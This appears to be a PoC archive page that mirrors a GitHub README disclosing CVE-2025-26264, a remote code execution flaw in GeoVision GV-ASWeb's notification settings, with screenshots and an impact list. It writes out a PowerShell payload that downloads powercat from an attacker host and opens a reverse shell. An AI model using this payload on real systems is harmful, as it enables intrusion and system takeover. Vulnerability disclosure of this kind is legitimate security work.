Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-26264 PoC — Geovision GV-ASWeb 代码注入漏洞

Source
https://github.com/DRAGOWN/CVE-2025-26264
Associated Vulnerability
Title:Geovision GV-ASWeb 代码注入漏洞 (CVE-2025-26264)
Description:Geovision GV-ASWeb是中国奇偶(Geovision)公司的一个基于 Web 的软件,用于远程访问和配置 GV-ASManager 的数据库。 Geovision GV-ASWeb 6.1.2.0及之前版本存在代码注入漏洞,该漏洞源于通知设置功能存在远程代码执行,可能导致系统完全被控制。
Description
CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.
Readme
# CVE-2025-26264
CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise. 

# Requirements
To perform successful attack an attacker requires:
  - Network access to the GV-ASManager web application with version 6.1.2.0 or less;
  - Access to an account with privilege of managing _Notification Settings_ feature.

# Impact
The vulnerability can be leveraged to **perform the following unauthorized actions**:
+ An account with privilege of managing _Notification Settings_ feature is able to:
  - Perform Remote Code Execution attack.
+ After the successfull attack, **an attacker will be able to**:
  - Access, modify, or delete sensitive system information; 
  - Plant a system backdoor;
  - Perform ransomware attack;
  - Perform lateral movement in the internal network.

# CVE-2025-26264 PoC [Testing GeoVision v6.1.2.0]

Exploiting Remote Code Execution vulnerability in GeoVision GV-ASManager's ASWeb platform is possible against versions 6.1.2.0 or less (there is no fix as of 26 February 2025).

<img src="https://github.com/user-attachments/assets/9bfbad93-b734-4e22-9605-5a1aeb07ca84" width="700">

> GeoVision ASManager's ASWeb function Notification Setting is vulnerable to RCE

<img src="https://github.com/user-attachments/assets/622bc766-a9c2-4170-9267-f7c9c34d323b" width="700">

> HTTP request of setting up a notification on a specific event: Failed TAWeb login attempt

According to this script, If there is a failed TAWeb login attempt, the following PowerShell script will be executed:

`powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell`

<img src="https://github.com/user-attachments/assets/82d22334-2447-4f42-9e0b-da0d39856b9b" width="700">

> A failed attempt of authentication in TAWeb

<img src="https://github.com/user-attachments/assets/21aa366f-8e6b-458f-9df7-3f8a2a8696ee" width="700">

> Victim's host: The script opens a backdoor to the attacker's host.

<img src="https://github.com/user-attachments/assets/af116e08-606f-4ef5-b4b2-75236c473b3f" width="700">

> Attacker's host: An attacker gets the shell

## Contact
If you have a question, you can contact me, Giorgi Dograshvili on [LinkedIn](https://ge.linkedin.com/in/giorgi-dograshvili).
File Snapshot

 [4.0K]  /data/pocs/acff05f1ccf29979f5ab9d51e9c323286cf785c1
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.